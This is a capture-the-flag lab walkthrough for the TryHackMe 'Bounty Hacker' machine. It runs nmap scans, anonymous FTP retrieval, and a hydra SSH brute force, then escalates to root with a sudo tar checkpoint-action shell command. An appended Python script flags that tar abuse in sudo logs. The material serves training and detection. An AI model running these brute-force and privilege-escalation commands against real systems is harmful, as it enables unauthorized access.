TryHackMe: Bounty Hacker
1. Deploy the machine.
2. Find open ports on the machine
Port scan
nmap -Pn <ip>
There are 3 open ports: 21, 22, 80.
OS and service scan
nmap -A -p 21,22,80 <ip>
The OS is Ubuntu.
There are 3 services:
21 ftp with anonymous login
22 ssh
80 http
Vuln scan
nmap --script vuln -p 21,22,80 <ip>
Access HTTP site (port 80)
There are 3 names: spike, jet, and ed.
Let’s note them as possible usernames.
View the page source. There’s an /images/ directory.
Access it. Nothing much there.
Access FTP on port 21 with anonymous login
ftp <ip>
Name: anonymous
ls -la
There are 2 files: locks.txt and task.txt.
Download them
get locks.txt
get task.txt
Read locks.txt
cat locks.txt
Seems like this is a password file.
Read task.txt
cat task.txt
3. Who wrote the task list?
The answer is in task.txt.
ANS: l*n
4. What service can you bruteforce with the text file found?
It seems there’s another possible username.
Let’s create users.txt first. There are 5 usernames in total.
Bruteforce SSH on port 22
hydra -L users.txt -P locks.txt <ip> ssh -t 4 -u -F -V
SSH can be bruteforced.
5. What is the users password?
ANS: The answer is from #4.
6. user.txt
ssh lin@<ip>
ls -la
cat user.txt
7. root.txt
Let’s do privilege escalation. I will check sudo first.
sudo -l
Luckily, sudo lets me run tar.
Look up tar in GTFOBins.
Run the command
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Let’s verify that the privilege escalation worked.
id
Now I’m root.
cd /root
ls
cat root.txt
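
From the defender's side, the sudo tar step above leaves a record in the sudo log. The following is an added example, not part of the original write-up: it scans sudo syslog records for tar invoked with an option that starts another program. The log lines, hostname, timestamps and the /bin/tar path are constructed for illustration.

```python
import re
import shlex

# GNU tar long options that make tar start another program.
EXEC_OPTIONS = {"--checkpoint-action", "--to-command", "--use-compress-program",
                "--rsh-command", "--info-script", "--new-volume-script"}

# sudo syslog record: "<user> : TTY=.. ; PWD=.. ; USER=<target> ; COMMAND=<cmd>"
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$")

def risky_tar_options(command):
    """Return the program-executing options used if `command` runs tar, else []."""
    try:
        argv = shlex.split(command)
    except ValueError:            # unbalanced quotes: fall back to a plain split
        argv = command.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "tar":
        return []
    hits = []
    for i, arg in enumerate(argv[1:], start=1):
        name, sep, value = arg.partition("=")
        if name not in EXEC_OPTIONS:
            continue
        if not sep:               # "--option VALUE" form: value is the next argument
            value = argv[i + 1] if i + 1 < len(argv) else ""
        if name == "--checkpoint-action" and not value.startswith("exec"):
            continue              # dot, echo, sleep ... actions run no program
        hits.append(f"{name}={value}")
    return hits

def scan(lines):
    """Return (user, target_user, options) for each sudo record that trips the check."""
    findings = []
    for line in lines:
        m = SUDO_RE.search(line)
        if m and (opts := risky_tar_options(m.group("cmd"))):
            findings.append((m.group("user"), m.group("target"), opts))
    return findings

# Constructed sample records (not taken from the target machine).
SAMPLE_LOG = [
    "Jan 10 10:01:02 host sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -cf /tmp/backup.tar /home/lin/Documents",
    "Jan 10 10:03:17 host sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh",
    "Jan 10 10:05:40 host sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/usr/bin/id",
]

if __name__ == "__main__":
    for user, target, opts in scan(SAMPLE_LOG):
        print(f"ALERT {user} -> {target}: tar started a program via {opts}")
```

GNU tar also accepts unambiguous abbreviations of long options and the short forms -I and -F, which a production rule should match as well.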